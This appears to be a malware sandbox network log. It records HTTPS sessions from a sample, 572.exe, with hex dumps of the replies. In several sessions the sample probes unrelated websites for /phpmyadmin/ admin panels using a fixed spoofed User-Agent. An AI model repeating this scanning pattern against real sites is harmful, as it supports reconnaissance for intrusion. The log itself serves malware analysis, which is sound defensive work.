                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5491INData Raw: 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 76 6f 69 64 28 29 3b 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 6c 61 77 5f 63 6f 6f 6b 69 65 5f 61 6c 65 72 74 5f 6d 6f 72 65 27 29 2e 66 61 64 65 49 6e 28 31 35 30 29 3b 24 28 27 23 6c 61 77 5f 63 6f 6f 6b 69 65 5f 61 6c 65 72 74 5f 6d 6f 72 65 5f 63 6c 6f 73 65 27 29 2e 66 61 64 65 49 6e 28 31 30 30 29 3b 22 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 0d 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 6e 2f 61 64 61 74 76 65 64 65 6c 65 6d 5f 63 6f 6f 6b 69 65 5f 74 69 6c 74 76 61 22 3e 49 20 64 6f 20 6e 6f 74 20 61 63 63 65 70 74 3c 2f 61 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rivacy Policy</a><a href="javascript:void();" onClick="$('#law_cookie_alert_more').fadeIn(150);$('#law_cookie_alert_more_close').fadeIn(100);">More information</a><a href="/en/adatvedelem_cookie_tiltva">I do not accept</a></div><div id="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                40192.168.2.655712104.21.5.25443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC159OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC765INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zR2GSD8KwUph09fC4xogSkI%2Bis%2BeG5MqGc2jkuMnnP4m5Gg%2FYvZfk%2F39P3jTovB%2FX2JJmapsM7NAf9ZSw1IA6RyQYkol%2BbM%2FCU7Vi1BjlLLY%2FQIG5RCjgpfLeGw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb70df05b166-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC604INData Raw: 32 38 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 0a 3c 74 69 74 6c 65 3e 3a 2e 20 54 65 72 6e 61 4e 65 74 20 2e 3a 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 2f 62 6f 6f 74 73 74 72 61 70 74 61 73 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 28c1<!DOCTYPE html><html lang="es"><head><meta charset="utf-8"><title>:. TernaNet .:</title><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="description" content /><meta name="author" content="//bootstraptaste
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 49 45 20 39 5d 3e 0d 0a 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 68 74 6d 6c 35 73 68 69 6d 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 73 37 2e 61 64 64 74 68 69 73 2e 63 6f 6d 2f 6a 73 2f 33 30 30 2f 61 64 64 74 68 69 73 5f 77 69 64 67 65 74 2e 6a 73 23 70 75 62 69 64 3d 72 61 2d 35 34 35 62 39 63 66 35 32 37 31 38 61 34 33 63 22 20 61 73 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 77 69 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: IE 9]> <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--></head><body><script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-545b9cf52718a43c" async></script><script> win
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 2d 68 6f 76 65 72 3d 22 64 72 6f 70 64 6f 77 6e 22 20 64 61 74 61 2d 64 65 6c 61 79 3d 22 30 22 20 64 61 74 61 2d 63 6c 6f 73 65 2d 6f 74 68 65 72 73 3d 22 66 61 6c 73 65 22 3e 50 72 6f 64 75 63 74 6f 73 20 3c 62 20 63 6c 61 73 73 3d 22 20 69 63 6f 6e 2d 61 6e 67 6c 65 2d 64 6f 77 6e 22 3e 3c 2f 62 3e 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 76 69 73 69 6f 6e 2e 68 74 6d 6c 22 3e 56 69 73 69 c3 b3 6e 20 47 65 6e 65 72 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 6e 65 74 2e 68 74 6d 6c 22 3e 54 65 72 6e 61 4e 65 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 74 65 72 6e 61 73 63 68 6f 6f 6c 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: -hover="dropdown" data-delay="0" data-close-others="false">Productos <b class=" icon-angle-down"></b></a><ul class="dropdown-menu"><li><a href="vision.html">Visin General</a></li><li><a href="ternanet.html">TernaNet</a></li><li><a href="ternaschool.
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 6f 6e 65 73 20 79 20 50 72 65 63 69 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 63 6f 6e 74 61 63 74 6f 70 72 6f 6d 6f 22 3e 43 6f 6e 74 61 63 74 6f 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 66 65 61 74 75 72 65 64 22 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 32 22 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 73 6c 69 64 65 72 22 20 63 6c 61 73 73 3d 22 66 6c 65 78 73 6c 69 64 65 72 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ones y Precios</a></li><li><a href="contactopromo">Contacto</a></li></ul></div></div></div></header><section id="featured"><div class="container"><div class="row"><div class="col-lg-12"><div id="main-slider" class="flexslider"><ul class="s
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 73 75 63 63 65 73 73 22 3e 0a 3c 68 34 3e 4e 75 65 73 74 72 61 20 53 6f 6c 75 63 69 c3 b3 6e 3c 2f 68 34 3e 0a 3c 70 3e 4f 66 72 65 63 65 72 20 75 6e 61 20 70 6c 61 74 61 66 6f 72 6d 61 20 6c 69 73 74 61 2c 20 61 6d 70 6c 69 61 20 79 20 65 73 74 61 62 6c 65 20 70 61 72 61 20 69 6e 73 74 69 74 75 63 69 6f 6e 65 73 20 64 65 20 65 64 75 63 61 63 69 c3 b3 6e 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 39 22 3e 0a 3c 68 34 3e 4c 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: iv class="container"><div class="row"><div class="col-lg-3"><div class="alert alert-success"><h4>Nuestra Solucin</h4><p>Ofrecer una plataforma lista, amplia y estable para instituciones de educacin.</p></div></div><div class="col-lg-9"><h4>La
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 6e 20 65 6e 20 75 6e 20 70 72 6f 63 65 73 6f 20 73 65 6e 63 69 6c 6c 6f 20 79 20 72 c3 a1 70 69 64 6f 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 67 72 61 79 20 61 6c 69 67 6e 63 65 6e 74 65 72 22 3e 0a 3c 68 34 3e 52 61 70 69 64 65 7a 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 52 65 64 75 63 65 20 65 6c 20 74 69 65 6d 70 6f 20 65 6e 20 6c 6f 73 20 70 72 6f 63 65 73 6f 73 20 6d 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: n en un proceso sencillo y rpido.</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box-gray aligncenter"><h4>Rapidez</h4><div class="icon"> <i class="fa fa-clock-o fa-3x"></i> </div><p>Reduce el tiempo en los procesos ma
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 3e 0a 3c 68 34 3e 54 72 61 62 61 6a 65 20 63 c3 b3 6d 6f 64 61 6d 65 6e 74 65 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 6d 69 6c 65 2d 6f 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 53 65 20 65 6c 65 76 61 20 6c 61 20 65 66 69 63 69 65 6e 63 69 61 20 65 6e 20 65 6c 20 64 65 73 65 6d 70 65 c3 b1 6f 20 64 65 6c 20 70 65 72 73 6f 6e 61 6c 20 64 65 20 63 6f 6e 74 72 6f 6c 20 64 65 20 65 73 74 75 64 69 6f 73 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ><h4>Trabaje cmodamente</h4><div class="icon"> <i class="fa fa-smile-o fa-3x"></i> </div><p>Se eleva la eficiencia en el desempeo del personal de control de estudios</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1369INData Raw: 6c 65 73 20 61 22 29 2e 74 6f 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 09 24 28 22 2e 74 6f 6f 6c 74 69 70 2d 65 78 61 6d 70 6c 65 73 20 73 70 61 6e 22 29 2e 74 6f 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: les a").tooltip({ placement : 'bottom' });$(".tooltip-examples span").tooltip({ placement : 'bottom' });});</script><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r]
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC254INData Raw: 69 74 69 6f 6e 29 2f 62 6f 74 74 6f 6d 5f 6c 65 66 74 2f 28 6d 61 29 2f 62 72 2f 28 68 69 64 65 5f 6f 66 66 6c 69 6e 65 29 2f 74 72 75 65 2f 28 74 6f 70 29 2f 33 35 30 2f 28 75 6e 69 74 73 29 2f 70 69 78 65 6c 73 2f 28 6c 65 61 76 65 61 6d 65 73 73 61 67 65 29 2f 74 72 75 65 2f 28 74 68 65 6d 65 29 2f 31 3f 72 3d 27 2b 72 65 66 66 65 72 65 72 2b 27 26 6c 3d 27 2b 6c 6f 63 61 74 69 6f 6e 3b 0d 0a 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 70 6f 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ition)/bottom_left/(ma)/br/(hide_offline)/true/(top)/350/(units)/pixels/(leaveamessage)/true/(theme)/1?r='+refferer+'&l='+location;var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);})();</script></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                41192.168.2.65487218.200.3.224443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hero-wars.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC200INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.hero-wars.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                42192.168.2.65489282.221.28.171443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC166OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC256INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.uh.is/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                43192.168.2.654853162.241.203.30443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC262INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2361
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC2361INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="tel


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                44192.168.2.655111172.66.43.117443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC904INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: FLYSESSID=r2c0p26i5n0hv6h164082hcuoe; path=/; domain=adf.ly; HttpOnly; SameSite=Lax; secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: adfly
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=0
                                                                                                                                                                                                                                                                                                                                                                location: /
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P02FTpBWkltv8XB5VgPtlvAi0hvlHGf%2BVnGMigGD2FEASXp9j%2FCwA4otZHfhM8d4P3HaqW7iG3K51Dy4dufqds%2Fm0SGd5XfWKZUOvodA2qKIRWqcp98B%2FJA0WJ1YiG0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb709d376755-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                45192.168.2.6545943.161.136.69443524C:\Users\user\AppData\Local\Temp\572.exe
